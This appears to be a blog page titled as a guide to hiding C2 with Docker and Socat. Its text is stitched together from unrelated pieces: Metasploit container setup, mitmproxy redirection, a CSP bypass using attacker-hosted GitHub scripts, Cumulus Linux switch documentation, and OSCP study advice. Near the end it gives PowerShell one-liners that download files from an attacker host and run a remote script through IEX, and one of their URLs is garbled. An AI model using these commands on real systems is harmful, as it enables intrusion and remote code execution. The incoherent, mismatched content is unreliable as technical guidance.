
Hosting and hiding your C2 with Docker and Socat: A Practical Guide

  • settwalltentoula
  • Aug 12, 2023
  • 7 min read


If you wish to import a certificate from the Docker host, make sure you have mounted the required files into the Metasploit container with an additional -v argument, as we did for the docker_delivery.rc file. Mount them read-only (the :ro suffix); the container only needs to read the certificate and key, and a bind mount keeps the host file's permissions, so a private key that is group- or world-readable on the host is just as exposed inside the container.
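The following script is an added example, not code from the original post: it assembles the docker run invocation that bind-mounts the resource script, the certificate and the private key into the container, and refuses to proceed if the key is readable by anyone other than its owner. The image name (metasploitframework/metasploit-framework), the /tmp mount points inside the container, the handler port 4444 and the file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): assemble the docker run command
# that bind-mounts a resource script plus a host TLS certificate and key into
# the Metasploit container.  Assumptions: the image name, read-only mounts
# under /tmp in the container, and a handler listening on port 4444.

IMAGE="metasploitframework/metasploit-framework"
PORT="${MSF_PORT:-4444}"

# A bind mount keeps the host file's mode, so a private key readable by group
# or others on the host is just as exposed inside the container.  Refuse it.
check_key_perms() {
    if find "$1" \( -perm -004 -o -perm -040 \) 2>/dev/null | grep -q .; then
        echo "refusing to mount $1: readable by group/others (chmod 600 it first)" >&2
        return 1
    fi
    return 0
}

# Print the docker invocation after checking that the host files exist and look
# like what we are about to mount (a resource script, a PEM cert, a PEM key).
msf_docker_cmd() {
    rc="$1"; cert="$2"; key="$3"
    for f in "$rc" "$cert" "$key"; do
        [ -r "$f" ] || { echo "missing or unreadable: $f" >&2; return 1; }
    done
    grep -q 'BEGIN CERTIFICATE' "$cert" || { echo "$cert is not a PEM certificate" >&2; return 1; }
    grep -q 'PRIVATE KEY' "$key" || { echo "$key is not a PEM private key" >&2; return 1; }
    check_key_perms "$key" || return 1
    # Trailing backslashes keep the printed command pasteable and eval-able.
    printf '%s\n' "docker run --rm -it -p ${PORT}:${PORT} \\" \
        "  -v ${rc}:/tmp/docker_delivery.rc:ro \\" \
        "  -v ${cert}:/tmp/cert.pem:ro \\" \
        "  -v ${key}:/tmp/key.pem:ro \\" \
        "  ${IMAGE} ./msfconsole -r /tmp/docker_delivery.rc"
}

# Execute only when explicitly asked, e.g.:
#   MSF_DOCKER_EXEC=1 sh msf-run.sh ./docker_delivery.rc ./cert.pem ./key.pem
# Without the variable the script just prints the command for review.
if [ "${MSF_DOCKER_EXEC:-0}" = "1" ]; then
    eval "$(msf_docker_cmd "$@")"
else
    [ "$#" -eq 3 ] && msf_docker_cmd "$@"
fi
```

Inside the container the resource script then refers to the mounted paths (for example set HandlerSSLCert /tmp/cert.pem), which is why the container-side paths are fixed in the script rather than taken from the host layout.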







It is possible to use pulseaudio within the VM to play back a WAV file to the physical sound card. I'm using docker 17.03.1-ce on Mac OS Sierra and have used brew to install sox. This setup also requires socat to be installed on the VM, but someone with more pulseaudio knowledge (or I, if I get more time) should be able to remove this part, I think.


These rules tell pf to redirect all traffic arriving on $mitm_if and destined for port 80 or 443 to the local mitmproxy instance listening on port 8080. Replace the $mitm_if value (en0 in the example) with the interface on which your test device will appear. Note that rdr only matches packets that arrive inbound on that interface, so the test device must be using the Mac as its gateway; traffic originating on the Mac itself is not caught.
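The pf.conf fragment below is an added illustration of the rule the paragraph describes; it is not from the original post. The interface name en0 and the mitmproxy port 8080 are assumptions taken from the text above.

```pf
# pf.conf fragment (added illustration, not from the original post).
# $mitm_if is assumed to be en0; set it to the interface your device appears on.
mitm_if = "en0"

# Redirect HTTP and HTTPS arriving from the device to mitmproxy on 127.0.0.1:8080.
# Only packets that come in on $mitm_if match, so the device must route via this host.
rdr pass on $mitm_if inet proto tcp from any to any port {80, 443} -> 127.0.0.1 port 8080
```

Load it with sudo pfctl -f pf.conf followed by sudo pfctl -e, enable forwarding with sudo sysctl -w net.inet.ip.forwarding=1, and start mitmproxy in transparent mode (mitmproxy --mode transparent --showhost) so it reconstructs the original destination from the redirected connection.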


The problem with this policy is that anyone can host JavaScript files on the allow-listed host. To host your own JavaScript files there, create a public GitHub repository and commit your JavaScript files to it. Then format the script URL so that it dynamically pulls the JavaScript file from your GitHub repository. The format of the URL should be as follows:
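To make the failure mode concrete, the two headers below are an added illustration, not from the original post: a host-based script-src allow list beside the nonce-based form that is not bypassed by uploading a file to the allow-listed host. The host name cdn.example and the nonce value are placeholders.

```http
# Added illustration (not from the original post).  cdn.example stands in for
# whatever host the policy allow-lists; only the shape of the directive matters.

# Weak: any script that anyone can place anywhere on the allow-listed host runs.
Content-Security-Policy: script-src 'self' https://cdn.example

# Hardened: only scripts carrying this response's nonce run.  With
# 'strict-dynamic' the host allow list no longer decides, so a public upload
# path on that host gives an attacker nothing.  The nonce must be fresh per response.
Content-Security-Policy: script-src 'nonce-d3b07384d113' 'strict-dynamic'; object-src 'none'; base-uri 'none'
```

When reviewing a policy, treat every host in script-src as a question: can an untrusted party get a file served from that origin? If the answer is yes for any of them, the allow list is not a control.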


You can find the most up-to-date hardware compatibility list (HCL) here. Use the HCL to confirm that your switch model is supported with Cumulus Linux. The HCL is updated regularly, listing products by port configuration, manufacturer and SKU part number.


When Cumulus Linux starts for the first time, the management port makes a DHCPv4 request. To determine the IP address of the switch, cross-reference the MAC address of the switch with the leases on your DHCP server. The MAC address is typically printed on the side of the switch or on the box in which the unit ships.


To install Cumulus Linux using a DHCP/web server with DHCP options, set up a DHCP/web server on your laptop and connect the eth0 management port of the switch to your laptop. After you connect the cable, the installation proceeds as follows:


ZTP scripts come in different forms and frequently perform many of the same tasks. As BASH is the most common language used for ZTP scripts, the following BASH snippets are provided so that you can perform common tasks with robust error checking.


DNS names are frequently used in ZTP scripts. The ping_until_reachable function tests that a DNS name resolves to a reachable IP address. Call it with each DNS target used in your script before you use that name anywhere else, so that a script that would otherwise fail part-way through stops early with a clear error.


If you apply a management VRF in your script, either apply it last or reboot afterwards. If you do not apply the management VRF last, you must prefix any command that needs eth0 to reach the outside with /usr/bin/ip vrf exec mgmt; for example, /usr/bin/ip vrf exec mgmt apt-get update -y.
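The script below is an added example covering the two snippets just described (the DNS reachability check and running commands inside the management VRF); it is not from the original page or from Cumulus's ZTP documentation. The attempt count, the delay, the host names repo.example.net and ntp.example.net, and the apt-get call in ztp_main are assumptions; the check for /sys/class/net/mgmt as the sign that the VRF device exists is also an assumption.

```shell
#!/bin/bash
# Added example (not from the original page or Cumulus's ZTP docs): helper
# functions for a ZTP script.  Attempt counts, delays, host names and the
# apt-get call in ztp_main are assumptions chosen for illustration.

# Resolve and ping a DNS name until it answers or the attempt budget runs out.
# Returns 1 on failure so the caller can stop before using the name elsewhere.
ping_until_reachable() {
    target="$1"
    max_attempts="${2:-30}"   # assumption: 30 attempts
    delay="${3:-2}"           # assumption: 2 s between attempts
    attempt=0
    while [ "$attempt" -lt "$max_attempts" ]; do
        attempt=$((attempt + 1))
        # ping resolves the name itself; -W bounds the wait for each reply.
        if ping -c 1 -W 2 "$target" >/dev/null 2>&1; then
            echo "reachable: $target (attempt $attempt)"
            return 0
        fi
        sleep "$delay"
    done
    echo "unreachable after $max_attempts attempts: $target" >&2
    return 1
}

# Once a management VRF is applied, anything that must leave via eth0 has to run
# inside it.  This wrapper adds the prefix only when the VRF device exists
# (assumption: /sys/class/net/mgmt is present once the VRF is up), so the same
# script works both before and after the VRF is configured.
with_mgmt_vrf() {
    if [ -d /sys/class/net/mgmt ]; then
        /usr/bin/ip vrf exec mgmt "$@"
    else
        "$@"
    fi
}

# Typical flow: confirm every DNS target first, then do the network work.
ztp_main() {
    for host in "$@"; do
        ping_until_reachable "$host" || return 1
    done
    with_mgmt_vrf apt-get update -y
}

# Run only when executed with ZTP_RUN=1 (e.g. from the ZTP URL), not when sourced.
if [ "${ZTP_RUN:-0}" = "1" ]; then
    ztp_main repo.example.net ntp.example.net
fi
```

Because ping_until_reachable returns a non-zero status instead of looping forever, a ZTP run against a switch whose DHCP-supplied resolver is wrong fails within a bounded time and leaves a usable error in the ZTP log rather than a hung provisioning job.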


You can use DHCP to specify your NTP servers. Ensure that the DHCP-generated configuration file named /run/ntp.conf.dhcp exists. This file is generated by the /etc/dhcp/dhclient-exit-hooks.d/ntp script and is a copy of the default /etc/ntp.conf with a modified server list from the DHCP server. If this file does not exist and you plan on using DHCP in the future, you can copy your current /etc/ntp.conf file to the location of the DHCP file.


The initial authentication configuration is done through the PAM modules and an updated version of the libpam-tacplus package. When the package is installed, the PAM configuration in /etc/pam.d is updated with the pam-auth-update command. If you have made changes to your PAM configuration, you need to integrate those changes yourself. If you are also using LDAP with the libpam-ldap package, you might need to edit the PAM configuration to get the LDAP and TACACS+ ordering that you prefer. The libpam-tacplus rules are written to skip over the rules that follow them, so the success=2 values might need adjusting to skip over the LDAP rules as well; a skip count that is off by one lands on pam_deny.so and locks out users whose TACACS+ authentication succeeded.
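The fragment below is an added illustration of that ordering, not the page's own file or the one pam-auth-update writes. It shows TACACS+ ahead of local passwords and LDAP in /etc/pam.d/common-auth; the module options (include=/etc/tacplus_servers, nullok_secure, use_first_pass) are assumptions and should be taken from your installed package's defaults.

```pam
# /etc/pam.d/common-auth fragment (added illustration; options are assumptions).
# success=N means "on success, skip the next N lines".  Every skip must land on
# pam_permit.so, so N counts the remaining auth lines before it, pam_deny included.
auth    [success=3 default=ignore]  pam_tacplus.so  include=/etc/tacplus_servers
auth    [success=2 default=ignore]  pam_unix.so     nullok_secure try_first_pass
auth    [success=1 default=ignore]  pam_ldap.so     use_first_pass
auth    requisite                   pam_deny.so
auth    required                    pam_permit.so

# Failure mode to avoid: if pam_ldap.so is inserted above while pam_tacplus.so
# still carries success=2 (the count it had with only pam_unix.so below it),
# a successful TACACS+ login skips pam_unix and pam_ldap and lands on
# pam_deny.so, so every TACACS+ user is refused.
```

After editing, verify from a second session before logging out: a TACACS+ user, a local user and an LDAP user should each succeed, and a wrong password for each should fail, otherwise the skip counts are wrong.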


For any TACACS+ users to execute net add, net del, and net commit commands and to restart services with NCLU, you need to add those users to the users_with_edit variable in the /etc/netd.conf file. Add the tacacs15 user and, depending upon your policies, other users (tacacs1 through tacacs14) to this variable.


For example, to rate limit the incoming traffic on swp1 to 400 packets per second with a burst of 100 packets (burst is a packet count, not a rate) and set the class of the queue for the policed traffic to 0, add a rule of the following form to the appropriate .rules file under /etc/cumulus/acl/policy.d:
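The rule below is an added illustration, not the page's own rule. It uses the POLICE target from Cumulus's cl-acltool rule syntax as I know it (set-mode pkt with set-rate, set-burst and set-class); confirm the target options against your release's documentation before applying.

```iptables
[iptables]
# Added illustration of a cl-acltool policer rule (syntax assumed from the
# Cumulus ACL documentation).  Ingress on swp1: 400 packets/s, burst 100
# packets, policed traffic queued in class 0.
-A INPUT --in-interface swp1 -j POLICE --set-mode pkt --set-rate 400 --set-burst 100 --set-class 0
```

Save it as a .rules file under /etc/cumulus/acl/policy.d and install it with cl-acltool -i; cl-acltool -L ip then lists the installed rule so you can confirm it was accepted.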


If your post-up command also starts, restarts, or reloads any systemd service, you must use the --no-block option with systemctl. Otherwise, that service, or even the switch itself, might hang after starting or restarting. For example, to restart the dhcrelay service after bringing up VLAN 100, put the systemctl call on a post-up line in the VLAN stanza of /etc/network/interfaces.
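The /etc/network/interfaces fragment below is an added illustration of that stanza, not from the original page. The bridge member ports, the address 192.0.2.1/24 and the unit name dhcrelay.service are assumptions.

```interfaces
# /etc/network/interfaces fragment (added illustration; ports, address and
# unit name are assumptions).
auto bridge
iface bridge
    bridge-vlan-aware yes
    bridge-ports swp1 swp2
    bridge-vids 100

auto vlan100
iface vlan100
    vlan-id 100
    vlan-raw-device bridge
    address 192.0.2.1/24
    # --no-block returns as soon as the job is queued instead of waiting for
    # the unit to finish, which avoids the hang described above.
    post-up systemctl --no-block restart dhcrelay.service
```

Apply it with ifreload -a and then check systemctl status dhcrelay.service separately, since with --no-block the post-up line no longer reports whether the restart succeeded.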


If you change the port speed in the /etc/cumulus/ports.conf file but the speed is also configured for that port in the /etc/network/interfaces file, after you edit the /etc/cumulus/ports.conf file and restart switchd, you must also run the ifreload -a command so that the /etc/network/interfaces file is also updated with your change.


The /usr/lib/python2.7/dist-packages/cumulus/__chip_config/[bcm|mlx]/datapath.conf file assigns buffer space and egress queues. The default thresholds defined in datapath.conf are intended for data center environments, but certain workloads may require additional tuning. Make small, incremental changes and validate each one against your application's performance. Be sure to back up the original file before making changes.


Before you can authenticate with 802.1x on your switch, you must configure a RADIUS server somewhere in your network. Popular examples of commercial software with RADIUS capability include Cisco ISE and Aruba ClearPass.


The default pre-auth ACL file is /etc/cumulus/acl/policy.d/dot1x_preauth_dacl/default_preauth_dacl.rules, which you can modify, or you can create your own. The default pre-auth ACL permits DHCP (using source port 68 and destination port 67) and DNS (using destination port 53) before 802.1X authorization. You configure pre-auth ACLs only with ebtables syntax.
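The rules below are an added illustration of a pre-auth ACL in ebtables syntax, not the contents of the page's default_preauth_dacl.rules file. The chain name, the match options and the resolver address 192.0.2.53 are assumptions; the second rule deliberately restricts DNS to one destination rather than permitting port 53 to anywhere, because an unauthenticated host that can reach any resolver has a ready-made tunnel out.

```ebtables
[ebtables]
# Added illustration of a pre-auth ACL (chain and options are assumptions).
# DHCP: client source port 68 to server destination port 67.
-A FORWARD -p IPv4 --ip-proto udp --ip-sport 68 --ip-dport 67 -j ACCEPT
# DNS: only to the site resolver, not to any host on port 53.
-A FORWARD -p IPv4 --ip-proto udp --ip-dst 192.0.2.53 --ip-dport 53 -j ACCEPT
```

Everything else from an unauthorized port is dropped until 802.1X authorization completes, so check that any captive-portal or onboarding traffic you rely on is covered by an explicit rule here.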


This section gives an overview of what to expect on the course. The PDF guide that comes with your course materials lists resources and explains how to approach the material and the lab environment. I highly recommend that you read the restrictions carefully, along with OffSec's view of how a report should be written. Those sections will help you understand how to take notes, how to write your report, what to expect when testing the lab environment, and what to be careful of as you work through the course.


There will come a time when you need to use a public exploit against your target to see whether you can obtain a shell. You may need to modify the shellcode, or other parts of the exploit, to match your system before you get a connection back from the target. A word of advice: be wary of exploits you download from public sources. They can endanger any system, including yours. Review the source code and test exploits in a contained environment before running them on your actual system.


PowerShell:

Downloading a file from your host:
powershell (New-Object System.Net.WebClient).DownloadFile('<IP Address>/update.exe', 'msi-installer.exe')

Downloading a file and executing it with Invoke-Expression:
powershell IEX (New-Object System.Net.WebClient).DownloadString(' -installer.exe')


Offensive Security has released its own private lab environment where you can practice your pentest skills on the boxes they provide online. The platform offers two tiers, PG Play and PG Practice. PG Play brings the boxes from Vulnhub to life and provides dedicated access, either by connecting to their environment through a VPN or by using the browser-based Kali Linux system. Keep in mind that PG Play only allows you three hours per day to assess a system in the Play environment. They only provide Linux boxes as well, but this could change in the future.


An online penetration testing platform that contains a variety of machines to help you improve your penetration testing skills. If you have not yet registered, you will need to pass a challenge to generate yourself an activation code. Once you have your activation code, you will be able to access their range. In the free tier you can play with the 20 active machines; they cycle a new system into the range every week and retire an old one. If you want access to the retired machines, you will need VIP access. It is very affordable, in my opinion, and worth investing in. If you do not have the funds to invest in Hackthebox, do not worry, because you can certainly find walkthroughs online (once the boxes are retired). One place I would definitely recommend is IppSec's Hackthebox walkthroughs on YouTube. I love watching his videos because he goes step by step through how to obtain access to the target and how to escalate privileges to root. Each box has a different scenario, and IppSec always has something extra to throw in during his walkthroughs.


Just like Hackthebox, except you have to download the vulnerable machines and run them on your local system. You will need VMware or VirtualBox (I recommend VMware Workstation) to run these vulnerable systems. Please make sure that you run these vulnerable systems on an isolated network and not on a public one. Thanks to g0tmi1k and his team for hosting this site, and to the creators who submit these vulnerable machines. I have also created a list of Vulnhub machines that I have found to be OSCP-like. You can find them here and on NetSecFocus.




© 2023 by EPS Marketing. Proudly created with Wix.com
